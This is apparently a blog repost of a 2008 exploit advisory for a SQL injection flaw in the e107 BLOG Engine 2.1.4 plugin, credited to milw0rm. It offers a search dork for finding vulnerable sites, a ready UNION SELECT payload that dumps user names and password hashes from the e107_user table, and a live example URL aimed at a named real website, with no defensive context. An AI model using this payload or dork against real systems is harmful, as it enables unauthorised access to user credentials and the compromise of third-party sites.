e107 Plugin BLOG Engine 2.1.4 Remote SQL Injection Vulnerability
author: ZoRLu
dork: allinurl:"macgurublog.php?uid="
exploit:
http://localhost/script_path/macgurublog.php?uid=[SQL]
[SQL]=
-1+union+select+concat(user_name,char(58),user_password,char(58)),2+from+e107_user/*
example:
http://www.dmchat.org.uk/e107_plugins/macgurublog_menu/macgurublog.php?uid=-1+union+select+concat(user_name,char(58),user_password,char(58)),2+from+e107_user/*
Kaynak: http://www.milw0rm.com/exploits/6856
28 Ekim 2008 Salı
Kaydol:
Kayıt Yorumları (Atom)
0 yorum:
Yorum Gönder